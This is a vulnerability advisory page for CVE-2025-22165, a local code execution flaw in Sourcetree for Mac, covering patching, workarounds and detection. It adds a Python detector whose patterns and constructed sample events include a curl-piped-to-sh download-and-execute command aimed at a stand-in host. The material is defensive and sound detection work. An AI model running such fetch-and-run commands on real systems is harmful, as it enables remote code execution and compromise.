CVE-2025-22165
📋 TL;DR
CVE-2025-22165 is a Medium-severity arbitrary code execution vulnerability in Sourcetree for Mac that allows a locally authenticated attacker to execute arbitrary code with high impact to confidentiality, integrity, and availability. It requires user interaction and affects Sourcetree for Mac users running version 4.2.8 or later. Attackers could potentially gain full control of affected systems.
💻 Affected Systems
- Sourcetree for Mac
📦 What is this software?
Sourcetree by Atlassian
⚠️ Risk & Real-World Impact
Worst Case
An attacker with local access could execute arbitrary code with the privileges of the Sourcetree application, potentially leading to full system compromise, data theft, or ransomware deployment.
Likely Case
A malicious actor with local access could execute code to steal Git credentials, modify repositories, or install malware, requiring the user to interact with a malicious file or trigger.
If Mitigated
With proper access controls and user awareness, the risk is minimal, since exploitation requires local authentication and user interaction.
🎯 Exploit Status
Requires local authentication and user interaction. Reported through the Atlassian Bug Bounty Program, which suggests responsible disclosure.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Latest version available at https://www.sourcetreeapp.com/download-archives
Vendor Advisory: https://jira.atlassian.com/browse/SRCTREE-8217
Restart Required: Yes
Instructions:
1. Download the latest Sourcetree for Mac from https://www.sourcetreeapp.com/download-archives.
2. Install the update.
3. Restart the Sourcetree application.
🔧 Temporary Workarounds
Restrict local access
Limit local access to systems running vulnerable Sourcetree versions to trusted users only.
User awareness training
Educate users about not opening untrusted files or repositories in Sourcetree.
🧯 If You Can't Patch
- Restrict Sourcetree usage to essential personnel only and monitor for suspicious activity.
- Implement application whitelisting to prevent execution of unauthorized binaries from the Sourcetree context.
🔍 How to Verify
Check if Vulnerable:
Check the Sourcetree version via the application menu → About Sourcetree. If the version is 4.2.8 or later (and not the latest patched version), you are vulnerable.
Check Version:
Open Sourcetree and go to the Sourcetree menu → About Sourcetree.
Verify Fix Applied:
After updating, verify that the version shown in About Sourcetree matches the latest version from the download center.
📡 Detection & Monitoring
Log Indicators:
- Unusual process execution from Sourcetree context
- Suspicious file operations in Git repositories
Network Indicators:
- Unexpected outbound connections from Sourcetree process
SIEM Query:
process.name:"Sourcetree" AND (process.parent.name NOT IN ["launchd", "loginwindow", "bash", "zsh"] OR process.cmdline CONTAINS suspicious_pattern)
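The following is an added example, not part of the advisory or of Atlassian's tooling: it runs the logic of the SIEM query above over constructed process events and goes one step further by also covering the "unusual process execution from Sourcetree context" log indicator, flagging children spawned by Sourcetree that are not its usual helpers. The expected-parent list is the query's own; the expected-child set, the event format and the stand-in for the unspecified `suspicious_pattern` are assumptions.

```python
import re
from dataclasses import dataclass

# Parents the SIEM query accepts as normal launchers of Sourcetree.
EXPECTED_PARENTS = {"launchd", "loginwindow", "bash", "zsh"}
# Assumed: helpers Sourcetree normally spawns (tune to your environment).
EXPECTED_CHILDREN = {"git", "hg", "ssh", "git-remote-https", "git-credential-osxkeychain"}
# Assumed stand-in for the query's unspecified `suspicious_pattern`.
SUSPICIOUS_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"curl\s+[^|]*\|\s*(ba)?sh",   # download-and-execute pipeline
    r"base64\s+(-d|--decode)",     # decoded payload staging
    r"\bosascript\b",              # scripting from a GUI app context
)]

@dataclass
class ProcessEvent:
    name: str
    parent_name: str
    cmdline: str

def check_event(ev):
    """Return a reason string if the event should alert, else None.
    Rule 1 mirrors the SIEM query: process.name is Sourcetree and either the
    parent is unexpected or the cmdline matches a suspicious pattern.
    Rule 2 adds the log indicator: a child of Sourcetree that is not one of
    the helpers it normally spawns."""
    if ev.name == "Sourcetree":
        if ev.parent_name not in EXPECTED_PARENTS:
            return f"Sourcetree launched by unexpected parent {ev.parent_name!r}"
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(ev.cmdline):
                return f"Sourcetree cmdline matched {pat.pattern!r}"
    elif ev.parent_name == "Sourcetree" and ev.name not in EXPECTED_CHILDREN:
        return f"unexpected child {ev.name!r} spawned by Sourcetree"
    return None

def triage(events):
    """Return [(event, reason)] for every event that alerts."""
    return [(ev, r) for ev in events for r in [check_event(ev)] if r]

# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    ProcessEvent("Sourcetree", "launchd", "/Applications/Sourcetree.app/Contents/MacOS/Sourcetree"),
    ProcessEvent("git", "Sourcetree", "git fetch origin"),
    ProcessEvent("Sourcetree", "Preview", "/Applications/Sourcetree.app/Contents/MacOS/Sourcetree"),
    ProcessEvent("sh", "Sourcetree", "sh -c 'curl http://example.invalid/p | sh'"),
    ProcessEvent("Sourcetree", "zsh", "/Applications/Sourcetree.app/Contents/MacOS/Sourcetree; osascript -e 'display dialog'"),
]

if __name__ == "__main__":
    for ev, reason in triage(SAMPLE_EVENTS):
        print(f"ALERT {ev.name} (parent={ev.parent_name}): {reason}")
```

Note that the query as written only inspects the Sourcetree process itself, so a payload spawned as a child (the fourth sample event) is caught only by the added child-process rule.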